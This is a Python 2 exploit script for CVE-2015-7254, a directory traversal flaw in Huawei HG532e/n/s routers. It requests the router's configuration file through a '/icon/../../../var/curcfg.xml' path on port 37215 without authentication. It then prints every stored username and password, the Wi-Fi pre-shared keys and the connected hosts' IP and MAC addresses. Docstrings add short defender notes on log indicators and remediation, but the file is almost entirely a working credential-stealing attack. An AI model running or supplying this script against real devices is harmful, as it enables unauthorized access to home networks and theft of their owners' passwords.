#!/usr/bin/python
# Exploit for CVE-2015-7254 (Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices).
# Original exploit by: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick).
# Modified by: Adrian Trejo (@0xAdrian).
import logging
import sys
import urllib2
import defusedxml.ElementTree as ET
# Request defaults used by fetch_url(): a generic User-Agent header and the
# timeout, in seconds, handed to urlopen().
DEFAULT_HEADERS = {"User-Agent": "Mozilla"}
DEFAULT_TIMEOUT = 5

# Display names looked up by the integer Userlevel attribute in getData().
# Only three entries exist, so a level outside the tuple raises IndexError.
USERLEVEL = ("Default Admin", "User", "Admin")
def fetch_url(url):
    """Issue a GET for *url* and return the response body.

    The request carries only the module-level DEFAULT_HEADERS (this function
    attaches no credentials or cookies) and waits at most DEFAULT_TIMEOUT
    seconds.

    Returns the raw body, or None when urlopen()/read() raises; the exception
    is logged instead of being propagated.
    """
    req = urllib2.Request(url, headers=DEFAULT_HEADERS)
    try:
        return urllib2.urlopen(req, timeout=DEFAULT_TIMEOUT).read()
    except Exception as err:
        # Best-effort fetch: every failure (timeout, refused connection, HTTP
        # error status, ...) is reported through logging and signalled as None.
        logging.error("Exception: %s", err)
        return None
def exploit(ip):
    """Request the device configuration file via the CVE-2015-7254 traversal.

    Builds an HTTP URL for *ip* on TCP port 37215 whose path starts at
    ``/icon/`` and climbs three ``../`` segments to ``var/curcfg.xml``, then
    hands it to fetch_url(). No authentication material is sent.

    Returns the response body, or None when the fetch failed.

    Defender notes: the request is a plain GET, so an HTTP or network log
    entry for port 37215 whose path contains ``/icon/../`` is a direct
    indicator of an attempt. Remediation is presumably a vendor firmware
    update plus blocking untrusted access to that port; confirm against the
    vendor advisory for the affected HG532 models.
    """
    return fetch_url("http://%s:37215/icon/../../../var/curcfg.xml" % (ip))
def getData(xml):
    """Parse a curcfg.xml document and print accounts, WLAN settings and hosts.

    *xml* is the configuration file body as returned by exploit(). Parsing
    goes through ``ET``, which this file imports from defusedxml, so the
    device-supplied document is not handed to the stock XML parser.

    Three sections are written to stdout:
      * every ``UserInfoInstance``: username, password and user level;
      * every enabled ``WLANConfigurationInstance``: SSID, pre-shared key and
        channel;
      * every ``X_DeviceManageHostInstance``: hostname, IP and MAC address.

    Nothing is returned. A missing attribute or element is not handled:
    TypeError (None in ``int()`` or string concatenation), IndexError (user
    level outside USERLEVEL) or AttributeError (no PreSharedKeyInstance)
    propagates to the caller.

    Defender notes: the output holds account passwords and the Wi-Fi key in
    whatever form the file stores them, so captured output is as sensitive as
    the file itself. On an affected device every value printed here should be
    treated as disclosed and rotated after remediation.
    """
    tree = ET.fromstring(xml)

    print "\n\nUsers"
    for account in tree.findall('.//UserInfoInstance'):
        # All three attributes are read (and the level converted) before
        # anything is printed, so a malformed entry prints nothing.
        name = account.get('Username')
        secret = account.get('Userpassword')
        level_index = int(account.get('Userlevel'))
        print "\nUsername: " + name
        print "Password: " + secret
        print "User Level: " + USERLEVEL[level_index]

    print "\n\nWLAN Configuration"
    # The XPath predicate keeps only radios whose Enable attribute is "1".
    for wlan in tree.findall('.//WLANConfigurationInstance[@Enable="1"]'):
        network_name = wlan.get('SSID')
        radio_channel = wlan.get('Channel')
        key_node = wlan.find('.//PreSharedKeyInstance')
        shared_key = key_node.get('PreSharedKey')
        print "\nSSID: " + network_name
        print "Pre Shared Key: " + shared_key
        print "Channel: " + radio_channel

    print "\n\nHosts"
    for entry in tree.findall('.//X_DeviceManageHostInstance'):
        host_label = entry.get('HostName')
        address = entry.get('IPAddress')
        hardware_address = entry.get('MACAddress')
        print "\nHostname: " + host_label
        print "IP: " + address
        print "MAC: " + hardware_address
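def main():
    """Command-line entry point: fetch and print one device's configuration.

    Expects the device address as the single positional argument. Exits with
    status 2 and a usage line when it is missing, and with -1 (after logging
    an error) when exploit() returns None. Otherwise passes the fetched body
    to getData().
    """
    # Without this guard a missing argument surfaced as a bare IndexError
    # traceback instead of a usage message.
    if len(sys.argv) < 2:
        sys.stderr.write("Usage: %s <device-ip>\n" % sys.argv[0])
        sys.exit(2)

    targetip = sys.argv[1]
    print "Exploiting: " + targetip
    data = exploit(targetip)
    if data is None:
        logging.error("Exploit failed!")
        # sys.exit() rather than the bare exit() helper, which is injected by
        # the site module and is not guaranteed to exist (e.g. under -S).
        sys.exit(-1)
    print "Getting data..."
    getData(data)


if __name__ == "__main__":
    main()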